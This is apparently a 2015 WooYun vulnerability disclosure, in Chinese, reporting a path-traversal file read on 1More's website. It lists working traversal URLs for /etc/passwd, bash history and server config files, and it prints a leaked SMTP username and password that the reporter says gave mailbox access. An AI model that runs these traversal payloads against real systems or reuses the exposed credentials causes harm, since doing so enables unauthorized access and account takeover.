当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120521

漏洞标题:1More任意文件读取泄露敏感信息(已登入邮箱)

相关厂商:1More

漏洞作者: 路人甲

提交时间:2015-06-15 11:53

修复时间:2015-07-30 11:54

公开时间:2015-07-30 11:54

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1More任意文件读取泄露敏感信息(已登入邮箱)

详细说明:

1more.com静态文件处理不当,可读取任意文件:

http://www.1more.com/min?f=../../../../../../../../../../etc/nginx/nginx.conf%00.js

漏洞证明:

读取.bash_history,配置文件等:

/etc/passwd
/root/.bash_history
/min?f=../../../../../../../../../../home/1morenick/.bash_history%00.js
/min?f=../../../../../../../../../../etc/nginx/nginx.conf%00.js
/min?f=../../../../../../../../../../opt/apache-tomcat-6.0.35-siteback/webapps/ROOT/WEB-INF/classes/log4j.properties%00.js
/min?f=../../../../../../../../../../opt/apache-tomcat-6.0.35-msite/webapps/ROOT/WEB-INF/web.xml%00.js


找到邮箱密码:

log4j.appender.MAIL=org.apache.log4j.net.SMTPAppender  
log4j.appender.MAIL.Threshold=ERROR
log4j.appender.MAIL.BufferSize=0
log4j.appender.MAIL.SMTPHost=mail.1more.com
log4j.appender.MAIL.Subject=pcmallback-ErrorMessage
log4j.appender.MAIL.SMTPUsername=service
log4j.appender.MAIL.SMTPPassword=M123456
[email protected]
[email protected],[email protected]


可直接登录邮箱,发现这个邮箱已经被垃圾邮件充满了:

1more.png


修复方案:

过滤,限定不可跨父目录

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝